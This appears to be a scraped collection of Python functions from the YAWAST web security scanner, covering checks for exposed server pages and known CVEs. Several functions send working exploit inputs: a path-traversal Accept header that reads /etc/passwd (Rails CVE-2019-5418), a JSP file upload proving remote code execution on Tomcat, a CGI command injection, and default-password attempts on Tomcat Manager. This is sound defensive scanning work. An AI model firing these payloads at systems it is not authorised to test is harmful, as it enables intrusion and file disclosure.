Beispiel #1
0
def check_http_methods(
        url: str,
        path: Optional[str] = None) -> Tuple[List[str], List[Result]]:
    results: List[Result] = []
    supported_methods: List[str] = []

    # before we start, we should test an invalid verb, to see if it will accept anything
    res = network.http_custom("XINVALIDX", url)
    results += response_scanner.check_response(url, res)

    if res.status_code < 405:
        # no point in continuing, it'll return as if everything is supported, which is just noise
        return supported_methods, results

    if path is None:
        file_path = pkg_resources.resource_filename(
            "yawast", "resources/http-protocol-methods.txt")
    else:
        file_path = path

    with open(file_path) as file:
        for line in file:
            res = network.http_custom(line, url)

            if res.status_code < 405:
                supported_methods.append(line)

            results += response_scanner.check_response(url, res)

    return supported_methods, results
Beispiel #2
0
def check_cve_2019_5418(url: str) -> List[Result]:
    global _checked

    # this only applies to controllers, so skip the check unless the link ends with '/'
    if not url.endswith("/") or url in _checked:
        return []

    results: List[Result] = []
    _checked.append(url)

    try:
        res = network.http_get(
            url, False, {"Accept": "../../../../../../../../../e*c/p*sswd{{"}
        )
        body = res.text
        req = network.http_build_raw_request(res.request)

        results += response_scanner.check_response(url, res)

        pattern = r"root:[a-zA-Z0-9]+:0:0:.+$"
        mtch = re.search(pattern, body)

        if mtch:
            results.append(
                Result(
                    f"Rails CVE-2019-5418: File Content Disclosure: {url} - {mtch.group(0)}",
                    Vulnerabilities.SERVER_RAILS_CVE_2019_5418,
                    url,
                    [body, req],
                )
            )
    except Exception:
        output.debug_exception()

    return results
Beispiel #3
0
def check_options(url: str) -> List[Result]:
    results: List[Result] = []

    res = network.http_options(url)

    if "Allow" in res.headers:
        results.append(
            Result.from_evidence(
                Evidence.from_response(res),
                f"Allow HTTP Verbs (OPTIONS): {res.headers['Allow']}",
                Vln.HTTP_OPTIONS_ALLOW,
            )
        )

    if "Public" in res.headers:
        results.append(
            Result.from_evidence(
                Evidence.from_response(res),
                f"Public HTTP Verbs (OPTIONS): {res.headers['Public']}",
                Vln.HTTP_OPTIONS_PUBLIC,
            )
        )

    results += response_scanner.check_response(url, res)

    return results
Beispiel #4
0
def check_asp_net_debug(url: str) -> List[Result]:
    results: List[Result] = []

    res = network.http_custom(
        "DEBUG", url, additional_headers={"Command": "stop-debug", "Accept": "*/*"}
    )

    if res.status_code == 200 and "OK" in res.text:
        # we've got a hit, but could be a false positive
        # try this again, with a different verb
        xres = network.http_custom(
            "XDEBUG", url, additional_headers={"Command": "stop-debug", "Accept": "*/*"}
        )

        # if we get a 200 when using an invalid verb, it's a false positive
        # if we get something else, then the DEBUG actually did something
        if xres.status_code != 200:
            results.append(
                Result(
                    "ASP.NET Debugging Enabled",
                    Vulnerabilities.SERVER_ASPNET_DEBUG_ENABLED,
                    url,
                    [
                        network.http_build_raw_request(res.request),
                        network.http_build_raw_response(res),
                    ],
                )
            )
        else:
            output.debug("Server responds to invalid HTTP verbs with status 200")

    results += response_scanner.check_response(url, res)

    return results
Beispiel #5
0
def check_options(url: str) -> List[Result]:
    results: List[Result] = []

    res = network.http_options(url)

    if "Allow" in res.headers:
        results.append(
            Result(
                f"Allow HTTP Verbs (OPTIONS): {res.headers['Allow']}",
                Vulnerabilities.HTTP_OPTIONS_ALLOW,
                url,
                [
                    network.http_build_raw_request(res.request),
                    network.http_build_raw_response(res),
                ],
            )
        )

    if "Public" in res.headers:
        results.append(
            Result(
                f"Public HTTP Verbs (OPTIONS): {res.headers['Allow']}",
                Vulnerabilities.HTTP_OPTIONS_PUBLIC,
                url,
                [
                    network.http_build_raw_request(res.request),
                    network.http_build_raw_response(res),
                ],
            )
        )

    results += response_scanner.check_response(url, res)

    return results
Beispiel #6
0
def check_status(url: str) -> List[Result]:
    results: List[Result] = []
    search = ["status/", "stats/"]

    for path in search:
        target = urljoin(url, path)

        res = network.http_get(target, False)
        body = res.text

        if res.status_code == 200 and "Active connections:" in body:
            results.append(
                Result(
                    f"Nginx status page found: {target}",
                    Vulnerabilities.SERVER_NGINX_STATUS_EXPOSED,
                    target,
                    [
                        network.http_build_raw_request(res.request),
                        network.http_build_raw_response(res),
                    ],
                ))

        results += response_scanner.check_response(target, res)

    return results
Beispiel #7
0
def check_path_disclosure(wp_url: str) -> List[Result]:
    # this is a list of files that are known to throw a fatal error when accessed directly
    # this is from a manual review of all plugins with at least 1M installs
    urls = [
        "wp-content/plugins/hello.php",
        "wp-content/plugins/akismet/akismet.php",
        "wp-content/plugins/contact-form-7/includes/capabilities.php",
        "wp-content/plugins/wordpress-seo/admin/views/partial-alerts-errors.php",
        "wp-content/plugins/jetpack/load-jetpack.php",
        "wp-content/plugins/jetpack/uninstall.php",
        "wp-content/plugins/duplicate-post/duplicate-post-admin.php",
        "wp-content/plugins/wpforms-lite/includes/admin/class-welcome.php",
        "wp-content/plugins/wp-google-maps/base/includes/welcome.php",
        "wp-content/plugins/wp-super-cache/wp-cache.php",
        "wp-content/plugins/mailchimp-for-wp/integrations/wpforms/bootstrap.php",
        "wp-content/plugins/mailchimp-for-wp/integrations/bootstrap.php",
        "wp-content/plugins/regenerate-thumbnails/regenerate-thumbnails.php",
        "wp-content/plugins/advanced-custom-fields/includes/deprecated.php",
        "wp-content/plugins/redirection/redirection.php",
        "wp-content/plugins/wpforms-lite/includes/admin/importers/class-ninja-forms.php",
        "wp-content/plugins/ninja-forms/includes/deprecated.php",
        "wp-content/plugins/so-widgets-bundle/so-widgets-bundle.php",
        "wp-content/plugins/wp-fastest-cache/templates/preload.php",
        "wp-content/plugins/duplicate-page/duplicatepage.php",
        "wp-content/plugins/better-wp-security/better-wp-security.php",
        "wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-unlock-request.php",
        "wp-content/plugins/related-posts/views/settings.php",
        "wp-content/plugins/wpcontentguard/views/settings.php",
        "wp-content/plugins/simple-social-icons/simple-social-icons.php",
    ]
    results: List[Result] = []

    for url in urls:
        target = urljoin(wp_url, url)

        head = network.http_head(target, False)
        if head.status_code != 404:
            resp = network.http_get(target, False)
            if resp.status_code < 300 or resp.status_code >= 500:
                # we have some kind of response that could be useful
                if "<b>Fatal error</b>:" in resp.text:
                    # we have an error
                    pattern = r"<b>((\/|[A-Z]:\\).*.php)<\/b>"
                    if re.search(pattern, resp.text):
                        try:
                            path = re.findall(pattern, resp.text)[0][0]
                            results.append(
                                Result.from_evidence(
                                    Evidence.from_response(
                                        resp, {"path": path}),
                                    f"WordPress File Path Disclosure: {target} ({path})",
                                    Vulnerabilities.
                                    APP_WORDPRESS_PATH_DISCLOSURE,
                                ))
                        except Exception:
                            output.debug_exception()

            results += response_scanner.check_response(target, resp)

    return results
Beispiel #8
0
def _check_url(urls: List[str], queue, follow_redirections, recursive) -> None:
    files: List[str] = []
    results: List[Result] = []

    for url in urls:
        try:
            # get the HEAD first, we only really care about actual files
            res = network.http_head(url, False)

            if res.status_code < 300:
                # run a scan on the full result, so we can ensure that we get any issues
                results += response_scanner.check_response(
                    url, network.http_get(url, False))

                files.append(url)

                if recursive:
                    fl, re = find_directories(url, follow_redirections,
                                              recursive)

                    files.extend(fl)
                    results.extend(re)
            elif res.status_code < 400 and follow_redirections:
                if "Location" in res.headers:
                    _check_url([res.headers["Location"]], queue,
                               follow_redirections, recursive)
        except Exception as error:
            output.debug(f"Error checking URL ({url}): {str(error)}")

    queue.put((files, results))
Beispiel #9
0
def check_cve_2019_0232(links: List[str]) -> List[Result]:
    results: List[Result] = []
    targets: List[str] = []

    for link in links:
        if "cgi-bin" in link:
            if "?" in link:
                targets.append(f"{link}&dir")
            else:
                targets.append(f"{link}?dir")

    for target in targets:
        res = network.http_get(target, False)
        body = res.text

        if "<DIR>" in body:
            # we have a hit
            results.append(
                Result(
                    f"Apache Tomcat RCE (CVE-2019-0232): {target}",
                    Vulnerabilities.SERVER_TOMCAT_CVE_2019_0232,
                    target,
                    [
                        network.http_build_raw_request(res.request),
                        network.http_build_raw_response(res),
                    ],
                ))

        results += response_scanner.check_response(target, res)

    return results
Beispiel #10
0
    def test_response_scanner(self):
        network.init("", "", "")
        url = "https://adamcaudill.com/"
        resp = network.http_get(url)

        http.reset()
        res = response_scanner.check_response(url, resp)

        self.assertTrue(any("External JavaScript File" in r.message for r in res))
        self.assertTrue(any("Vulnerable JavaScript" in r.message for r in res))
Beispiel #11
0
def check_cve_2017_12615(url: str) -> List[Result]:
    results = []

    try:
        file_name = secrets.token_hex(12)
        check_value = secrets.token_hex(12)

        target = urljoin(url, f"{file_name}.jsp/")
        res_put = network.http_put(target, f"<% out.println({check_value});%>",
                                   False)

        if res_put.status_code < 300:
            # code should be 2xx for this to work
            # now we need to check to see if it worked
            created_file = urljoin(url, f"{file_name}.jsp")

            res_get = network.http_get(created_file, False)

            if check_value in res_get.text:
                # we have RCE
                results.append(
                    Result(
                        f"Apache Tomcat PUT RCE (CVE-2017-12615): {created_file}",
                        Vulnerabilities.SERVER_TOMCAT_CVE_2017_12615,
                        url,
                        [
                            network.http_build_raw_request(res_put.request),
                            network.http_build_raw_response(res_put),
                            network.http_build_raw_request(res_get.request),
                            network.http_build_raw_response(res_get),
                        ],
                    ))
            else:
                results += response_scanner.check_response(
                    created_file, res_get)
        else:
            # if we didn't get a hit, go ahead and scan it to see if there's
            #  anything else that we should be picking up.
            results += response_scanner.check_response(target, res_put)
    except Exception:
        output.debug_exception()

    return results
Beispiel #12
0
def check_for_jira(session: Session) -> Tuple[List[Result], Union[str, None]]:
    # this checks for an instance of Jira relative to the session URL
    results: List[Result] = []
    jira_url = None

    try:
        targets = [
            f"{session.url}secure/Dashboard.jspa",
            f"{session.url}jira/secure/Dashboard.jspa",
        ]

        for target in targets:
            res = network.http_get(target, False)

            if (
                res.status_code == 200
                and 'name="application-name" content="JIRA"' in res.text
            ):
                # we have a Jira instance
                jira_url = target

                # try to get the version
                ver_str = "unknown"
                try:
                    ver_pattern = (
                        r"<meta name=\"ajs-version-number\" content=\"([\d\.]+)\">"
                    )
                    version = re.search(ver_pattern, res.text).group(1)

                    build_pattern = (
                        r"<meta name=\"ajs-build-number\" content=\"(\d+)\">"
                    )
                    build = re.search(build_pattern, res.text).group(1)

                    ver_str = f"v{version}-{build}"
                except:
                    output.debug_exception()

                results.append(
                    Result.from_evidence(
                        Evidence.from_response(res),
                        f"Jira Installation Found ({ver_str}): {target}",
                        Vulnerabilities.APP_JIRA_FOUND,
                    )
                )

            results += response_scanner.check_response(target, res)

            break
    except Exception:
        output.debug_exception()

    return results, jira_url
Beispiel #13
0
    def _process(url: str, res: Response):
        nonlocal results, new_links

        if res.status_code == 200:
            # we found something!
            new_links.append(url)

            results.append(
                Result.from_evidence(
                    Evidence.from_response(res),
                    f"Found backup file: {url}",
                    Vulnerabilities.HTTP_BACKUP_FILE,
                ))

        results += response_scanner.check_response(target, res)
Beispiel #14
0
def check_trace(url: str) -> List[Result]:
    results: List[Result] = []

    res = network.http_custom("TRACE", url)
    body = res.text

    if res.status_code == 200 and "TRACE / HTTP/1.1" in body:
        results.append(
            Result.from_evidence(
                Evidence.from_response(res),
                "HTTP TRACE Enabled",
                Vln.HTTP_TRACE_ENABLED,
            ))

    results += response_scanner.check_response(url, res)

    return results
Beispiel #15
0
def check_propfind(url: str) -> List[Result]:
    results: List[Result] = []

    res = network.http_custom("PROPFIND", url)
    body = res.text

    if res.status_code <= 400 and len(body) > 0:
        if "Content-Type" in res.headers and "text/xml" in res.headers["Content-Type"]:
            results.append(
                Result.from_evidence(
                    Evidence.from_response(res),
                    "Possible Info Disclosure: PROPFIND Enabled",
                    Vln.HTTP_PROPFIND_ENABLED,
                )
            )

    results += response_scanner.check_response(url, res)

    return results
Beispiel #16
0
def check_struts_sample(url: str) -> List[Result]:
    results: List[Result] = []

    try:
        # make sure we have real 404s
        file_good, _, _, _ = network.check_404_response(url)
        if not file_good:
            return results

        search = [
            "Struts2XMLHelloWorld/User/home.action",
            "struts2-showcase/showcase.action",
            "struts2-showcase/titles/index.action",
            "struts2-bootstrap-showcase/",
            "struts2-showcase/index.action",
            "struts2-bootstrap-showcase/index.action",
            "struts2-rest-showcase/",
        ]

        for path in search:
            target = urljoin(url, path)

            res = network.http_get(target, False)

            # check for other issues
            results += response_scanner.check_response(target, res)

            if res.status_code == 200:
                results.append(
                    Result(
                        f"Struts Sample Found: {target}",
                        Vulnerabilities.SERVER_TOMCAT_STRUTS_SAMPLE,
                        target,
                        [
                            network.http_build_raw_request(res.request),
                            network.http_build_raw_response(res),
                        ],
                    )
                )
    except Exception:
        output.debug_exception()

    return results
Beispiel #17
0
def check_manager_password(url: str) -> List[Result]:
    results = []

    try:
        creds = [
            b"tomcat:tomcat",
            b"tomcat:password",
            b"tomcat:",
            b"admin:admin",
            b"admin:password",
            b"admin:",
        ]

        for cred in creds:
            ce = base64.b64encode(cred)

            res = network.http_get(url, False, {"Authorization": ce})
            body = res.text

            if (
                '<font size="+2">Tomcat Web Application Manager</font>' in body
                or '<font size="+2">Tomcat Virtual Host Manager</font>' in body
            ):
                # we got in
                results.append(
                    Result(
                        f"Apache Tomcat Weak Manager Password: '******' - {url}",
                        Vulnerabilities.SERVER_TOMCAT_MANAGER_WEAK_PASSWORD,
                        url,
                        [
                            network.http_build_raw_request(res.request),
                            network.http_build_raw_response(res),
                        ],
                    )
                )
            else:
                # if we didn't get a hit, go ahead and scan it to see if there's
                #  anything else that we should be picking up.
                results += response_scanner.check_response(url, res)
    except Exception:
        output.debug_exception()

    return results
Beispiel #18
0
def check_jira_user_registration(jira_url: str) -> List[Result]:
    results: List[Result] = []

    try:
        target = f"{jira_url.rsplit('/', 1)[0]}/Signup!default.jspa"
        res = network.http_get(target, False)

        if res.status_code == 200 and "<title>Sign up for Jira" in res.text:
            results.append(
                Result.from_evidence(
                    Evidence.from_response(res),
                    f"Jira User Registration Enabled: {target}",
                    Vulnerabilities.APP_JIRA_USER_REG_ENABLED,
                ))

        results += response_scanner.check_response(target, res)
    except Exception:
        output.debug_exception()

    return results
Beispiel #19
0
def check_server_status(url: str) -> List[Result]:
    results = []

    target = urljoin(url, "server-status/")

    res = network.http_get(target, False)
    body = res.text

    if "Apache Server Status" in body:
        results.append(
            Result(
                f"Apache HTTPD Server Status found: {target}",
                Vulnerabilities.SERVER_APACHE_STATUS,
                url,
                body,
            ))

    results += response_scanner.check_response(url, res)

    return results
Beispiel #20
0
def _check_url(url: str, targets: List[str]) -> Tuple[List[str], List[Result]]:
    files: List[str] = []
    results: List[Result] = []

    for target in targets:
        target_url = urljoin(url, target)

        res = network.http_get(target_url, False)

        results += response_scanner.check_response(target_url, res)

        if res.status_code < 300:
            files.append(target_url)
            results.append(
                Result.from_evidence(
                    Evidence.from_response(res),
                    f"File found: {target_url}",
                    Vulnerabilities.SERVER_SPECIAL_FILE_EXPOSED,
                ))

    return files, results
Beispiel #21
0
def check_manager(url: str) -> List[Result]:
    results = []

    try:
        for p in [urljoin(url, "manager/"), urljoin(url, "host-manager/")]:
            # check for both Tomcat 6, and 7+
            for path in [urljoin(p, "html/"), p]:

                res = network.http_get(path, False)

                body = res.text

                if "<tt>conf/tomcat-users.xml</tt>" in body:
                    # we have a finding
                    vuln = Vulnerabilities.SERVER_TOMCAT_MANAGER_EXPOSED
                    if "host-manager" in path:
                        vuln = Vulnerabilities.SERVER_TOMCAT_HOST_MANAGER_EXPOSED

                    results.append(
                        Result(
                            f"Apache Tomcat Manager found: {path}",
                            vuln,
                            path,
                            [
                                network.http_build_raw_request(res.request),
                                network.http_build_raw_response(res),
                            ],
                        )
                    )

                    # check to see if we can get in with a default password
                    results += check_manager_password(url)
                else:
                    # if we didn't get a hit, go ahead and scan it to see if there's
                    #  anything else that we should be picking up.
                    results += response_scanner.check_response(path, res)
    except Exception:
        output.debug_exception()

    return results
Beispiel #22
0
def check_trace(url: str) -> List[Result]:
    results: List[Result] = []

    res = network.http_custom("TRACE", url)
    body = res.text

    if res.status_code == 200 and "TRACE / HTTP/1.1" in body:
        results.append(
            Result(
                "HTTP TRACE Enabled",
                Vulnerabilities.HTTP_TRACE_ENABLED,
                url,
                [
                    network.http_build_raw_request(res.request),
                    network.http_build_raw_response(res),
                ],
            )
        )

    results += response_scanner.check_response(url, res)

    return results
Beispiel #23
0
def check_propfind(url: str) -> List[Result]:
    results: List[Result] = []

    res = network.http_custom("PROPFIND", url)
    body = res.text

    if res.status_code <= 400 and len(body) > 0:
        if "Content-Type" in res.headers and "text/xml" in res.headers["Content-Type"]:
            results.append(
                Result(
                    "Possible Info Disclosure: PROPFIND Enabled",
                    Vulnerabilities.HTTP_PROPFIND_ENABLED,
                    url,
                    [
                        network.http_build_raw_request(res.request),
                        network.http_build_raw_response(res),
                    ],
                )
            )

    results += response_scanner.check_response(url, res)

    return results
Beispiel #24
0
def check_cve_2019_5418(url: str) -> List[Result]:
    # this only applies to controllers, so skip the check unless the link ends with '/'
    if not url.endswith("/"):
        return []

    results: List[Result] = []

    res = network.http_get(
        url, False, {"Accept": "../../../../../../../../../etc/passwd{{"})
    body = res.text
    req = network.http_build_raw_request(res.request)

    results += response_scanner.check_response(url, res)

    if "root:" in body:
        results.append(
            Result(
                f"Rails CVE-2019-5418: File Content Disclosure: {url}",
                Vulnerabilities.SERVER_RAILS_CVE_2019_5418,
                url,
                [body, req],
            ))

    return results
Beispiel #25
0
def _file_search(session: Session, orig_links: List[str]) -> List[str]:
    new_files: List[str] = []
    file_good, file_res, path_good, path_res = network.check_404_response(session.url)

    # these are here for data typing
    results: Union[List[Result], None]
    links: Union[List[str], None]

    # check the 404 responses for any issues
    results = response_scanner.check_response(file_res.url, file_res)
    results += response_scanner.check_response(path_res.url, path_res)
    if results:
        reporter.display_results(results, "\t")

    if not file_good:
        reporter.display(
            "Web server does not respond properly to file 404 errors.",
            Issue(
                Vulnerabilities.SERVER_INVALID_404_FILE,
                session.url,
                Evidence.from_response(file_res),
            ),
        )
    if not path_good:
        reporter.display(
            "Web server does not respond properly to path 404 errors.",
            Issue(
                Vulnerabilities.SERVER_INVALID_404_PATH,
                session.url,
                Evidence.from_response(path_res),
            ),
        )

    if not (file_good or path_good):
        output.norm(
            "Site does not respond properly to non-existent file/path requests; search may take longer."
        )

    links, results = special_files.check_special_files(session.url)
    if results:
        reporter.display_results(results, "\t")

    new_files += links

    if session.args.files:
        output.empty()
        output.norm("Searching for common files (this will take a few minutes)...")

        with Spinner():
            try:
                links, results = file_search.find_files(session.url)
            except Exception as error:
                output.debug_exception()
                output.error(f"Error running scan: {str(error)}")
                results = None
                links = None

        if results is not None and results:
            reporter.display_results(results, "\t")

        if links is not None and links:
            new_files += links

            for l in links:
                if l not in orig_links:
                    output.norm(f"\tNew file found: {l}")

            output.empty()

    # check for common backup files
    all_links = orig_links + new_files
    with Spinner():
        backups, res = file_search.find_backups(all_links)
    if res:
        reporter.display_results(res, "\t")
    if backups:
        new_files += backups

    if path_good:
        links, results = special_files.check_special_paths(session.url)

        if results:
            reporter.display_results(results, "\t")

        new_files += links

        if session.args.dir:
            output.empty()
            output.norm(
                "Searching for common directories (this will take a few minutes)..."
            )

            with Spinner():
                try:
                    links, results = file_search.find_directories(
                        session.url,
                        session.args.dirlistredir,
                        session.args.dirrecursive,
                    )
                except Exception as error:
                    output.debug_exception()
                    output.error(f"Error running scan: {str(error)}")
                    results = None
                    links = None

            if results is not None and results:
                reporter.display_results(results, "\t")

            if links is not None and links:
                new_files += links

                for l in links:
                    if l not in orig_links:
                        output.norm(f"\tNew directory found: {l}")

                output.empty()

    # check for .DS_Store files
    res = file_search.find_ds_store(new_files)

    if res:
        reporter.display_results(res, "\t")

    return new_files
Beispiel #26
0
def _get_links(base_url: str, urls: List[str], queue, pool):
    global _links, _insecure, _tasks, _lock

    max_length = 1024 * 1024 * 3  # 3MB

    results: List[Result] = []

    # fail-safe to make sure we don't go too crazy
    if len(_links) > 10000:
        # if we have more than 10,000 URLs in our list, just stop
        output.debug(
            "Spider: Link list contains > 10,000 items. Stopped gathering more links."
        )

        return

    for url in urls:
        try:
            # list of pages found that will need to be processed
            to_process: List[str] = []

            res = network.http_get(url, False)

            # get the length, so that we don't parse huge documents
            if "Content-Length" in res.headers:
                length = int(res.headers["Content-Length"])
            else:
                length = len(res.content)

            if http_utils.is_text(res) and length < max_length:
                soup = BeautifulSoup(res.text, "html.parser")
            else:
                # no clue what this is
                soup = None

            results += response_scanner.check_response(url, res, soup)

            if soup is not None:
                for link in soup.find_all("a"):
                    href = link.get("href")

                    if str(href).startswith(
                            "/") and not str(href).startswith("//"):
                        href = urljoin(base_url, href)

                    if href is not None:
                        # check to see if this link is in scope
                        if base_url in href and href not in _links:
                            if "." in href.split("/")[-1]:
                                file_ext = href.split("/")[-1].split(".")[-1]
                            else:
                                file_ext = None

                            with _lock:
                                _links.append(href)

                            # filter out some of the obvious binary files
                            if file_ext is None or file_ext not in [
                                    "gzip",
                                    "jpg",
                                    "jpeg",
                                    "gif",
                                    "woff",
                                    "zip",
                                    "exe",
                                    "gz",
                                    "pdf",
                            ]:
                                if not _is_unsafe_link(href, link.string):
                                    to_process.append(href)
                                else:
                                    output.debug(
                                        f"Skipping unsafe URL: {link.string} - {href}"
                                    )
                            else:
                                output.debug(
                                    f'Skipping URL "{href}" due to file extension "{file_ext}"'
                                )
                        else:
                            if (base_url.startswith("https://")
                                    and str(href).startswith("http://")
                                    and str(href) not in _insecure):
                                # link from secure to insecure
                                with _lock:
                                    _insecure.append(str(href))

                                results.append(
                                    Result.from_evidence(
                                        Evidence.from_response(
                                            res, {"link": href}),
                                        f"Insecure Link: {url} links to {href}",
                                        Vulnerabilities.HTTP_INSECURE_LINK,
                                    ))

            # handle redirects
            if "Location" in res.headers:
                redirect = res.headers["Location"]

                # check for relative link
                if str(redirect).startswith("/"):
                    redirect = urljoin(base_url, redirect)

                # make sure that we aren't redirected out of scope
                if base_url in redirect:
                    to_process.append(redirect)

            if len(to_process) > 0:
                asy = pool.apply_async(_get_links,
                                       (base_url, to_process, queue, pool))

                with _lock:
                    _tasks.append(asy)
        except Exception:
            output.debug_exception()

    output.debug(f"GetLinks Task Completed - {len(results)} issues found.")
    queue.put(results)